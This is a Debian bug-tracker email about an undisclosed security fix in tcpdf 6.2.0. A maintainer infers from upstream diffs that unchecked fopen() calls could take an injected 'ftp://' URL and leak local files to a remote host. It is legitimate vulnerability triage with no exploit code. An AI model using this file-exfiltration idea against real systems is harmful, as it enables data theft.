Hi, CCing upstream author for confirmation. Nicola we are trying to understand what security fix went into tcpdf 6.2.0. The bug is private on sourceforge, could you make it public now?
For more details see: https://bugs.debian.org/814030 On Wed, 04 Jan 2017, David Prévot wrote: > >> Can you contact upstream for information on this security bug? I have > >> no idea what that could possibly mean. > > > > Did you got any information on that from upstream? The bug is stil > > closed, so does not really help. I did not contact upstream but looking at the changes in that version: https://sourceforge.net/p/tcpdf/code/ci/40662daa766bd3a6b5eafa44dfde680ee6661716/tree/tcpdf.php?diff=3d5921442e7adde1ce225104118bc246a1933c65 https://sourceforge.net/p/tcpdf/code/ci/40662daa766bd3a6b5eafa44dfde680ee6661716/tree/include/tcpdf_fonts.php?diff=3d5921442e7adde1ce225104118bc246a1933c65 https://sourceforge.net/p/tcpdf/code/ci/40662daa766bd3a6b5eafa44dfde680ee6661716/tree/include/tcpdf_static.php?diff=3d5921442e7adde1ce225104118bc246a1933c65 I see calls to fopen() being replaced by TCPDF_STATIC::fopenLocal() which does ensure that we pass only "file://" URL or which add this prefix if there's no "://" in the string. So I guess that this issue is related to this. All the fopen() calls are for files to which we write so I guess that we can possibly inject "ftp://"; URL in some parameters and get some local files sent to a remote location. Cheers, -- Raphaël Hertzog ◈ Debian Developer Support Debian LTS: http://www.freexian.com/services/debian-lts.html Learn to master Debian: http://debian-handbook.info/get/
